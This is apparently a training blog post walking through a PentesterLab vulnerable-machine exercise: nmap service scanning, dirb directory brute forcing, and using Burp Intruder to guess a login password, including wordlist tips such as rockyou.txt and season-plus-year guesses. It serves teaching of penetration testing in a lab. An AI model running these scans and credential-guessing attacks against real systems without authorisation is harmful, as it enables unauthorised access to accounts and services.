In our previous post, we talked about using robots.txt to uncover hidden information about a target website.
By the end of this post you should be able to:
- Use dirb to spider a website for directory content
- Use Burp to attempt a brute forcing attack
You will need the following:
- Kali Linux virtual machine installed and ready to go
- The following ISO file found here booted as a device in VMWare (see Hacking Tutorial): https://www.pentesterlab.com/exercises/web_for_pentester/iso
Alright, let’s get started. Find the target IP address of your vulnerable website by doing an ifconfig inside the terminal that pops up. If you can ping that address from your Kali box and get a response, you have your networking set up correctly. If not, you may have to change the network adapter to bridged or host-only and reboot.
Just like in hacking, we will start out by trying to enumerate the services that are actually running on the computer we are attacking.
nmap -sV -p- -v -O <ipaddresshere>
You should receive output similar to the following:
Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.16 ((Debian)) 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
If you weren’t already aware, most web applications run on ports 80 and 443. It’s possible for them to be on other ports, most commonly 8080, 8443, and 9090, but these are slightly more exotic. You can copy and paste this IP address your browser to see the web application, and you should see a page with the title of Web for Pentester.
Dirb
Hopefully your first instinct was to try and check robots.txt for interesting entries. Although this will usually identify some interesting files and directories, it’s not the case here. We are going to take a much noisier approach this time. On a real penetration test, we would only use this tool as a last resort because it is very easy to detect and has the potential of accidentally crashing a smaller site! In a terminal window, type the following command:
dirb http://<IPADDRESS>
This tool is designed to help a penetration tester identify hidden directories manually. What it does is it takes a list of common directory names and rapidly makes web requests. If the site returns with a code of 404, it will skip it and not output that url. If the code is different, say for example 200 (Status Found), it will then output that as a valid directory. You should be able to browse to some of these directories and find interesting files.
Brute Forcing with Burp
Now open up a new terminal and type burpsuite. Accept the default options and open up your web browser. Burp is what is known as a Web Proxy. This does not mean that it’s something that you use to access blocked games in the library. Instead, it sits in between the requests that you make to the webserver and lets you edit them on the fly before sending them out.
Make sure you change the proxy settings on the IceWeasel web browser to go to the Burp Proxy.
If you configured it correctly, trying to browse to a website will seem like it is not loading. This is normal. What’s happening is you need to manually look at the requests being made in Burp through the Proxy tab.
Now let’s try and see where this could be useful. Navigate to the following URL in your browser and watch what the request looks like:
http:///ldap/example2.php?name=hacker&password=testpassword
For starters, hit the forward button and see what happens. You should notice that the page loads, but it now displays a message that says unauthenticated. Let’s see if we can use this functionality to guess the password of the account named ‘hacker’.
Make the request in the browser again, but this time don’t forward it through. Click inside the text box and change the word after ‘&password=’ to be PIZZA and then forward it on through. It seems like we were able to change what was sent to the website, but our password was still wrong. Now let’s do this at scale.
Make the request one more time, but this time right click and say “send to intruder” or press Ctrl+I.
Clicking on the now-illuminated INTRUDER tab brings you to a new menu. Click on “positions” and you should see your original requested but this time wrapped with funny characters. Click “Clear” to remove this markers. What we want to do is try multiple combinations of passwords on the same user and see which one makes the response change. Highlight the word after ‘&password=” and press “Add” to target this parameter with our wordlist.
When you have it configured as in the screenshot above, click the “Payloads” tab. We want to guess a large list of words, so we can either paste them into the box or load them from a text file. There are numerous ways to get large dictionaries – one of which is rockyou.txt that was discussed in the Hacking blog. Other common guesses include the season followed by the year, sports teams, names, and the username as the password. For now, let’s manually input our guesses:
When you are ready, hit start attack. This will rapidly make these requests and return the resulting response. When you are completely finished, you should see a pane that looks like this:
Notice something interesting? All the failed logins have a length of 1721 but what about that 7th request? The size is different! Click on it to see what the response is:
Looks like we found the right password – the password for hacker is “hacker”.
Next steps
This exercise was adapted from the Pentesterlab.com course. Try your hand at some of the other challenges on this machine so you feel comfortable using different tools!
https://www.pentesterlab.com/exercises/web_for_pentester/course